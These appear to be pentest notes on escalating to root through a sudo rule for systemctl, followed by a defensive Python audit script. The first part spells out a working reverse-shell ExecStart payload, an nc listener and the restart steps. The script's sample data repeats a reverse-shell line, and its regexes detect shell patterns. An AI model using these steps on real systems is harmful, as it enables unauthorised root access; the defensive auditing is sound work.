When sudo lets a user run systemctl as root, that user can escalate to root by editing a service's unit file (its configuration) and having systemctl execute it.


sudo -l

(ALL) NOPASSWD: systemctl

If we can run the "systemctl" command as root and we can also edit a service's unit file, we can become root.


1. Update the Config File

Insert the reverse-shell payload into the unit file, here /etc/systemd/system/example.service, as the ExecStart line of its [Service] section, so the service runs it as root.

[Unit]
Description=This is an example service.

[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'


Replace "<local-ip>" with the IP address of your local machine (the one that will run the listener).

2. Start a Listener on the Local Machine

Then start a listener on the local machine to receive the root shell.

nc -lvnp 4444

3. Restart the Service

Reload the systemd daemon so it picks up the edited unit file, then restart the service.

sudo systemctl daemon-reload
sudo systemctl restart example.service

The listener on the local machine should now receive a root shell.
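As an added defensive example (not part of these notes), the Python script below audits the two preconditions the technique above relies on: a sudo rule that grants systemctl, and a unit file under /etc/systemd/system that a non-root user can modify. It also flags Exec lines that already contain a reverse-shell pattern, which is the indicator a responder would look for after the fact. The `sudo -l` output, unit-file contents and permission bits are all constructed inline so the script runs offline; on a real host you would feed it the actual `sudo -l` output and read each unit with `os.stat` and `open`.

```python
import re
import stat
from typing import Dict, List, Tuple

# Constructed sample of `sudo -l` output, shaped like the rule quoted in these notes.
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on host:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

User alice may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/systemctl
"""

# Constructed unit files: path -> (permission bits, content). Permissions are
# simulated so the audit runs offline; on a real host use os.stat(path).st_mode
# and open(path).read() instead.
SAMPLE_UNITS: Dict[str, Tuple[int, str]] = {
    "/etc/systemd/system/example.service": (
        0o666,  # world-writable: any local user can rewrite ExecStart
        "[Unit]\nDescription=This is an example service.\n\n"
        "[Service]\nExecStart=/usr/local/bin/example --serve\n",
    ),
    "/etc/systemd/system/backup.service": (
        0o644,  # correct permissions, but the Exec line is already a reverse shell
        "[Unit]\nDescription=Nightly backup\n\n"
        "[Service]\nExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'\n",
    ),
    "/etc/systemd/system/good.service": (
        0o644,
        "[Unit]\nDescription=Fine\n\n[Service]\nExecStart=/usr/bin/true\n",
    ),
}

# A sudoers rule line as printed by `sudo -l`: "(runas) [TAG: ...] cmd[, cmd...]"
SUDO_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")
# Exec* directives in a unit's [Service] section
EXEC_RE = re.compile(r"^Exec(?:Start|StartPre|StartPost|Stop|Reload)\s*=\s*(?P<cmd>.+)$", re.M)
# Shapes of interactive/reverse shells that have no place in a service's Exec line
SUSPICIOUS_EXEC = re.compile(r"/dev/tcp/|bash -i|\bnc\b.*-e|python.*socket")


def sudo_allows_systemctl(sudo_l_output: str) -> List[str]:
    """Return every rule line that lets the user run systemctl (bare name or full path)."""
    hits = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        # first token of each comma-separated command, so arguments don't matter
        cmds = [c.strip().split(" ")[0] for c in m.group("cmds").split(",")]
        if any(c == "systemctl" or c.endswith("/systemctl") for c in cmds):
            hits.append(line.strip())
    return hits


def audit_units(units: Dict[str, Tuple[int, str]]) -> Dict[str, List[str]]:
    """Flag unit files writable by group/other and Exec lines that look like shells."""
    findings: Dict[str, List[str]] = {}
    for path, (mode, content) in units.items():
        issues = []
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            issues.append(f"writable by group/other (mode {oct(mode)})")
        for m in EXEC_RE.finditer(content):
            if SUSPICIOUS_EXEC.search(m.group("cmd")):
                issues.append(f"suspicious exec line: {m.group('cmd')}")
        if issues:
            findings[path] = issues
    return findings


def assess(sudo_l_output: str, units: Dict[str, Tuple[int, str]]) -> dict:
    """Combine both checks: the escalation path exists only when both preconditions hold."""
    rules = sudo_allows_systemctl(sudo_l_output)
    unit_findings = audit_units(units)
    writable = [p for p, iss in unit_findings.items() if any(i.startswith("writable") for i in iss)]
    return {
        "sudo_systemctl_rules": rules,
        "unit_findings": unit_findings,
        "writable_units": writable,
        "escalation_path": bool(rules) and bool(writable),
    }


if __name__ == "__main__":
    report = assess(SAMPLE_SUDO_L, SAMPLE_UNITS)
    for key, value in report.items():
        print(f"{key}: {value}")
```

On the constructed input the report shows one systemctl rule, one world-writable unit and one unit whose ExecStart is already a reverse shell, so `escalation_path` is true. The fix on the host side is to keep every file under /etc/systemd/system owned by root with mode 0644, and to narrow the sudoers entry to the exact operations needed (for example a restart of one named unit) rather than an unrestricted systemctl.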

